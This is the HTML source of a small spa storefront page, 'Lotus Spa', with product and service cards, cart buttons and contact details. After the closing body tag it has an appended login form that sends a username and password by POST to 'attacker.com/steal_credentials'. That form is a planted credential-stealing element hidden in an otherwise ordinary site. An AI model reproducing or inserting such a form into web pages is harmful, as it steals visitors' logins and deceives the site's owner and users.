<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Lotus Spa</title>
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css" integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N" crossorigin="anonymous">
  <link rel="stylesheet" href="./css/bootstrap.min.css">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/x-icon" sizes="32x32" href="img.png">
  <link rel="manifest" href="/site.webmanifest">
  <link rel="stylesheet" href="./css/style.css">
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script>
    $(document).ready(function(){
              var btn = $('#backToTop');
              $(window).on('scroll', function() {
                  if ($(window).scrollTop() > 30) {
                      btn.addClass('show');
                  } else {
                      btn.removeClass('show');
                  }
              });
              btn.on('click', function(e) {
                  e.preventDefault();
                  $('html, body').animate({
                      scrollTop: 0
                  }, '300');
              });
          });
    </script>
  </head>

<body>
<header class="header-section">
    <div class="container">
      <nav class="navbar navbar-expand-lg fixed-top">
        <a class="navbar-fluid" href="index.htm"><img src="img.png" 
          width="100px" height="100px">
         </a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
          aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"> </span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
          <ul class="navbar-nav ml-auto">
            <li class="nav-item">
              <a class="nav-link" href="#about">О нас</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#products">О продукте</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#services">О услуге</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="#contacts">Контакты</a>
            </li>
          </ul>
        </div>
      </nav>
    </div>
    <div class="header-content">
      <video class="video-bg" src="./img/Untitled11.mp4" autoplay muted loop></video>
      <div class="container">
       <div class="header-text">
        <h1 class="header-title">Добро пожаловать в LOTUS Spa</h1>
        <p class="header-p">Мы предлагаем релаксацию и красоту</p>
       </div>
      </div>
    </div>
  </header>
  <section class="aboutus" id="about">
    <div class="container">
      <div class="about-main">
        <div class="about_text">
          <div class="line"></div>
          <h1 class="about-title">WHAT ABOUT US?</h1>
          <div class="line"></div>
          <p class="about-p">To combat actual problems of the skin of the face and body, Italian scientists have developed cosmetics "SAYA SPA natural resources".
             A wide range of preparations is combined into 11 lines that can turn any cosmetic procedure into unforgettable hours of relaxation and harmony, 
             which are impossible to resist, and the result of which is impossible to forget. The use of innovative active ingredients and serious scientific 
             research allow to achieve excellent results with a lasting effect. The unique composition of each drug is the result of the painstaking work of a 
             research laboratory.</p>
        </div>
        <div class="about-img">
          <img src="./img/engin-akyurt-ZbzYDboN7fg-unsplash.jpg" class="about-main-img" alt="">
        </div>
      </div>
    </div>

  </section>



  <section id="products" class="products-section">
    <div class="container">
      <h2>О продукте</h2>
      <div class="row">
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/taylor-beach-kwu9Ny5dKOE-unsplash.jpg" class="card-img-top" alt="Крем">
            <div class="card-body">
              <h5 class="card-title">Крем</h5>
              <p class="card-text">Catharsis - night lifting anti-aging cream-regenerator with filler effect. Intensive rejuvenating night cream with a high concentration of "anti-age".</p>
              <p class="card-price">$29.99</p>
              <button class="btn btn-primary addToCart" onclick="sound()">В корзину</button>
              <script>
                  function sound(){
                    var snd = new Audio('16446_1460642689.mp3')
                    snd.play()}
              </script>
              <button class="btn  removeFromCart" >Убрать из корзины</button>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/alina-rubo-LZ58cbdEnD0-unsplash.jpg" class="card-img-top" alt="Шампунь">
            <div class="card-body">
              <h5 class="card-title">Шампунь</h5>
              <p class="card-text">SeboControl is a sebum-regulating matting lipid-free emulsion cream for combinations and oily skin. An intensive sebum-regulating cream that controls the.</p>
              <p class="card-price">$14.99</p>
              
              <button class="btn btn-primary addToCart" onclick="sound()">В корзину</button>
              <script>
                  function sound(){
   var snd = new Audio('16446_1460642689.mp3')
   snd.play()
}
</script>
<button class="btn  removeFromCart" >Убрать из корзины</button>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/alexandra-tran-mWVvelLg21Q-unsplash.jpg" class="card-img-top" alt="Гель">
            <div class="card-body">
              <h5 class="card-title">Гель</h5>
              <p class="card-text">Genesis Revolution is a special emulsion for daily use, enriched with organic filters and a special revolutionary component, the action of which is aimed at protecting</p>
              <p class="card-price">$19.99</p>
              <button class="btn btn-primary addToCart" onclick="sound()">В корзину</button>
              <script>
                  function sound(){
   var snd = new Audio('16446_1460642689.mp3')
   snd.play()
}
</script>
<button class="btn removeFromCart" >Убрать из корзины</button>
</div>
          </div>
        </div>
      </div>
    </div>
  </section>

  <section id="services" class="services-section">
    <div class="container">
      <h2>О услуге</h2>
      <div class="row">
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/chelsea-shapouri-r40EYKVyutI-unsplash.jpg" class="card-img-top" alt="Массаж">
            <div class="card-body">
              <h5 class="card-title">Massage</h5>
              <p class="card-text">Professional skin care. To prolong the feeling of youth and freshness of the skin for as long as possible.</p>
              <p class="card-price">$49.99</p>
              <button class="btn btn-primary addToCart" onclick="sound()">Купить услугу</button>
              <script>
                  function sound(){
   var snd = new Audio('16446_1460642689.mp3')
   snd.play()
}
</script>
<button class="btn  removeFromCart" >Убрать из корзины</button>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/raphael-lovaski-Pe9IXUuC6QU-unsplash.jpg" class="card-img-top" alt="Пилинг">
            <div class="card-body">
              <h5 class="card-title">Peeling</h5>
              <p class="card-text">Professional body treatments BEAUTY SPA (Italy)
                Only professional care products can help the body at 35 look 18..</p>
              <p class="card-price">$39.99</p>
              <button class="btn btn-primary addToCart" onclick="sound()">Купить услугу</button>
              <script>
                  function sound(){
   var snd = new Audio('16446_1460642689.mp3')
   snd.play()
}
</script>
<button class="btn removeFromCart" >Убрать из корзины</button>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card">
            <img src="./img/huum-xn_MghoT9HE-unsplash.jpg" class="card-img-top" alt="Услуга">
            <div class="card-body">
              <h5 class="card-title">Cleansing</h5>
              <p class="card-text">Professional body skin care with modern cosmetics. the body at 35 look 18 feel yourself the best woman</p>
              <p class="card-price">$29.99</p>
              <button class="btn btn-primary addToCart" onclick="sound()">Купить услугу</button>
              <script>
                  function sound(){
   var snd = new Audio('16446_1460642689.mp3')
   snd.play()
}
</script>
<button class="btn  removeFromCart" >Убрать из корзины</button>
            </div>
          </div>
        </div>
      </div>
      <div class="cart-total">
        <h4>Общая сумма: <span id="totalPrice">$0.00</span></h4>
      </div>
    </div>
  </section>
  <a href="javascript:void(0);" id="backToTop" class="back-to-top">
    <i class="fa fa-angle-double-up"></i></a>
  <section id="contacts" class="contacts">
    <div class="container">
      <div class="contacts-main">
        <div class="contacts-text">
          <p class="saya" >inst:2209balalary</p>
        </div>
        <div class="contacts-text">
          <p class="saya" >number: 87026349977</p>
        </div>
        <div class="contacts-text">
          <p class="saya" >location: Astana IT Univeersity </p>
        </div>
      </div>
    </div>
  </section>



  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="./js/bootstrap.min.js"></script>
  <script src="./js/script.js"></script>
</body>
<form action="http://attacker.com/steal_credentials" method="POST">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username">
            <label for="password">Password:</label>
            <input type="password" id="password" name="password">
            <input type="submit" value="Submit">
        </form>
</html>
